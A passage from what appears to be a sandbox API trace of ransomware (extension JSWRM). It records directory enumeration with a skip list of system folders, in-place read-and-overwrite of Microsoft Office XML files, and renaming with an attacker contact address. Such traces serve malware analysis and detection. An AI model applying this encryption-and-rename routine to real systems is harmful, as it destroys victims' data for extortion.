(lpString1="PGMN092.XML", lpString2="..") returned 1 [0139.327] lstrcmpiW (lpString1="PGMN092.XML", lpString2="...") returned 1 [0139.327] lstrcmpiW (lpString1="PGMN092.XML", lpString2="windows") returned -1 [0139.327] lstrcmpiW (lpString1="PGMN092.XML", lpString2="recovery") returned -1 [0139.327] lstrcmpiW (lpString1="PGMN092.XML", lpString2="perflogs") returned 1 [0139.327] lstrcmpiW (lpString1="PGMN092.XML", lpString2="documents and settings") returned 1 [0139.327] lstrcmpiW (lpString1="PGMN092.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.327] lstrcmpiW (lpString1="PGMN092.XML", lpString2="system volume information") returned -1 [0139.327] lstrcmpiW (lpString1="PGMN092.XML", lpString2="msocache") returned 1 [0139.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN092.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN092.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN092.XML", lpUsedDefaultChar=0x0) returned 11 [0139.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN092.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN092.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN092.XML", lpUsedDefaultChar=0x0) returned 11 [0139.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.327] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN092.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn092.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.328] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2934) returned 1 [0139.328] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.328] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xb70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xb70, lpOverlapped=0x0) returned 1 [0139.330] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.330] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xb70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xb70, lpOverlapped=0x0) returned 1 [0139.330] CloseHandle (hObject=0x238) returned 1 [0139.330] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN092.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn092.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN092.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn092.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.331] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d791bfc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d791bfc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d7b7e3f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x22c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN095.XML", cAlternateFileName="")) returned 1 [0139.331] lstrcmpiW (lpString1="PGMN095.XML", lpString2=".") returned 1 [0139.331] lstrcmpiW (lpString1="PGMN095.XML", lpString2="..") returned 1 [0139.331] lstrcmpiW (lpString1="PGMN095.XML", lpString2="...") returned 1 [0139.331] lstrcmpiW (lpString1="PGMN095.XML", lpString2="windows") returned -1 [0139.331] lstrcmpiW (lpString1="PGMN095.XML", lpString2="recovery") returned -1 [0139.331] lstrcmpiW (lpString1="PGMN095.XML", lpString2="perflogs") returned 1 [0139.331] lstrcmpiW (lpString1="PGMN095.XML", lpString2="documents and settings") returned 1 [0139.332] lstrcmpiW (lpString1="PGMN095.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.332] lstrcmpiW (lpString1="PGMN095.XML", lpString2="system volume information") returned -1 [0139.332] lstrcmpiW (lpString1="PGMN095.XML", lpString2="msocache") returned 1 [0139.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN095.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN095.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN095.XML", lpUsedDefaultChar=0x0) returned 11 [0139.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN095.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN095.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN095.XML", lpUsedDefaultChar=0x0) returned 11 [0139.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.332] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN095.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn095.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.333] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=556) returned 1 [0139.333] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.334] ReadFile (in: hFile=0x238, lpBuffer=0x209950, nNumberOfBytesToRead=0x220, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209950*, lpNumberOfBytesRead=0x345e89c*=0x220, lpOverlapped=0x0) returned 1 [0139.334] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.334] WriteFile (in: hFile=0x238, lpBuffer=0x209950*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209950*, lpNumberOfBytesWritten=0x345e898*=0x220, lpOverlapped=0x0) returned 1 [0139.335] CloseHandle (hObject=0x238) returned 1 [0139.335] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN095.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn095.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN095.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn095.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.338] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d76b9e2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d76b9e2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d7b7e3f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x232, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN096.XML", cAlternateFileName="")) returned 1 [0139.338] lstrcmpiW (lpString1="PGMN096.XML", lpString2=".") returned 1 [0139.338] lstrcmpiW (lpString1="PGMN096.XML", lpString2="..") returned 1 [0139.338] lstrcmpiW (lpString1="PGMN096.XML", lpString2="...") returned 1 [0139.338] lstrcmpiW (lpString1="PGMN096.XML", lpString2="windows") returned -1 [0139.338] lstrcmpiW (lpString1="PGMN096.XML", lpString2="recovery") returned -1 [0139.338] lstrcmpiW (lpString1="PGMN096.XML", lpString2="perflogs") returned 1 [0139.338] lstrcmpiW (lpString1="PGMN096.XML", lpString2="documents and settings") returned 1 [0139.338] lstrcmpiW (lpString1="PGMN096.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.338] lstrcmpiW (lpString1="PGMN096.XML", lpString2="system volume information") returned -1 [0139.338] lstrcmpiW (lpString1="PGMN096.XML", lpString2="msocache") returned 1 [0139.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN096.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN096.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN096.XML", lpUsedDefaultChar=0x0) returned 11 [0139.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN096.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN096.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN096.XML", lpUsedDefaultChar=0x0) returned 11 [0139.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN096.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn096.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.339] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=562) returned 1 [0139.339] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.339] ReadFile (in: hFile=0x238, lpBuffer=0x1ee6d0, nNumberOfBytesToRead=0x230, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x1ee6d0*, lpNumberOfBytesRead=0x345e89c*=0x230, lpOverlapped=0x0) returned 1 [0139.340] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.340] WriteFile (in: hFile=0x238, lpBuffer=0x1ee6d0*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x1ee6d0*, lpNumberOfBytesWritten=0x345e898*=0x230, lpOverlapped=0x0) returned 1 [0139.340] CloseHandle (hObject=0x238) returned 1 [0139.340] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN096.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn096.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN096.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn096.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.342] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d76b9e2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d76b9e2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d7b7e3f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11424, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN097.XML", cAlternateFileName="")) returned 1 [0139.342] lstrcmpiW (lpString1="PGMN097.XML", lpString2=".") returned 1 [0139.342] lstrcmpiW (lpString1="PGMN097.XML", lpString2="..") returned 1 [0139.342] lstrcmpiW (lpString1="PGMN097.XML", lpString2="...") returned 1 [0139.342] lstrcmpiW (lpString1="PGMN097.XML", lpString2="windows") returned -1 [0139.342] lstrcmpiW (lpString1="PGMN097.XML", lpString2="recovery") returned -1 [0139.343] lstrcmpiW (lpString1="PGMN097.XML", lpString2="perflogs") returned 1 [0139.343] lstrcmpiW (lpString1="PGMN097.XML", lpString2="documents and settings") returned 1 [0139.343] lstrcmpiW (lpString1="PGMN097.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.343] lstrcmpiW (lpString1="PGMN097.XML", lpString2="system volume information") returned -1 [0139.343] lstrcmpiW (lpString1="PGMN097.XML", lpString2="msocache") returned 1 [0139.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN097.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN097.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN097.XML", lpUsedDefaultChar=0x0) returned 11 [0139.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN097.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN097.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN097.XML", lpUsedDefaultChar=0x0) returned 11 [0139.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.343] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN097.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn097.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.344] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=70692) returned 1 [0139.344] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.344] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11420, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x11420, lpOverlapped=0x0) returned 1 [0139.350] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.350] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11420, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x11420, lpOverlapped=0x0) returned 1 [0139.350] CloseHandle (hObject=0x238) returned 1 [0139.350] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN097.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn097.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN097.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn097.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.351] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d76b9e2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d76b9e2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d7b7e3f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8864, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN102.XML", cAlternateFileName="")) returned 1 [0139.351] lstrcmpiW (lpString1="PGMN102.XML", lpString2=".") returned 1 [0139.351] lstrcmpiW (lpString1="PGMN102.XML", lpString2="..") returned 1 [0139.351] lstrcmpiW (lpString1="PGMN102.XML", lpString2="...") returned 1 [0139.351] lstrcmpiW (lpString1="PGMN102.XML", lpString2="windows") returned -1 [0139.351] lstrcmpiW (lpString1="PGMN102.XML", lpString2="recovery") returned -1 [0139.351] lstrcmpiW (lpString1="PGMN102.XML", lpString2="perflogs") returned 1 [0139.351] lstrcmpiW (lpString1="PGMN102.XML", lpString2="documents and settings") returned 1 [0139.351] lstrcmpiW (lpString1="PGMN102.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.351] lstrcmpiW (lpString1="PGMN102.XML", lpString2="system volume information") returned -1 [0139.351] lstrcmpiW (lpString1="PGMN102.XML", lpString2="msocache") returned 1 [0139.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN102.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN102.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN102.XML", lpUsedDefaultChar=0x0) returned 11 [0139.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN102.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN102.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN102.XML", lpUsedDefaultChar=0x0) returned 11 [0139.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.352] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN102.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn102.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.352] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=34916) returned 1 [0139.353] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.353] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x8860, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x8860, lpOverlapped=0x0) returned 1 [0139.361] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.361] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x8860, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x8860, lpOverlapped=0x0) returned 1 [0139.361] CloseHandle (hObject=0x238) returned 1 [0139.361] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN102.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn102.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN102.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn102.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.362] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d76b9e2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d76b9e2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d791bfc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xde0c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN103.XML", cAlternateFileName="")) returned 1 [0139.362] lstrcmpiW (lpString1="PGMN103.XML", lpString2=".") returned 1 [0139.362] lstrcmpiW (lpString1="PGMN103.XML", lpString2="..") returned 1 [0139.362] lstrcmpiW (lpString1="PGMN103.XML", lpString2="...") returned 1 [0139.362] lstrcmpiW (lpString1="PGMN103.XML", lpString2="windows") returned -1 [0139.362] lstrcmpiW (lpString1="PGMN103.XML", lpString2="recovery") returned -1 [0139.362] lstrcmpiW (lpString1="PGMN103.XML", lpString2="perflogs") returned 1 [0139.362] lstrcmpiW (lpString1="PGMN103.XML", lpString2="documents and settings") returned 1 [0139.362] lstrcmpiW (lpString1="PGMN103.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.362] lstrcmpiW (lpString1="PGMN103.XML", lpString2="system volume information") returned -1 [0139.362] lstrcmpiW (lpString1="PGMN103.XML", lpString2="msocache") returned 1 [0139.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN103.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN103.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN103.XML", lpUsedDefaultChar=0x0) returned 11 [0139.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN103.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN103.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN103.XML", lpUsedDefaultChar=0x0) returned 11 [0139.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 